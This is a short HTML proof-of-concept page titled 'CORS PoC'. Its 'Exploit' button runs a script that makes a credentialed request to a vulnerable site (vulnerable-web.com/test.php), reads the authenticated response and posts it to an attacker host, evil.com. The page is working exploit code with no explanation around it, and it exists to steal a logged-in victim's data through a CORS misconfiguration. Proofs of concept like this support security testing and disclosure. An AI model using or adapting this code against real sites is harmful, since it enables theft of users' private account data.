<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS PoC</h2>
<html>
<body>
<button type='button' onclick='cors()'>Exploit</button>
<p id='demo'></p>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
var a = this.responseText; 
document.getElementById("demo").innerHTML = a;
xhttp.open("POST", "http://evil.com", true); //Sending data to Attacker's website
xhttp.withCredentials = true;
console.log(a);
xhttp.send("data="+a);
}
};
xhttp.open("GET", "http://vulnerable-web.com/test.php", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</body>
</html>
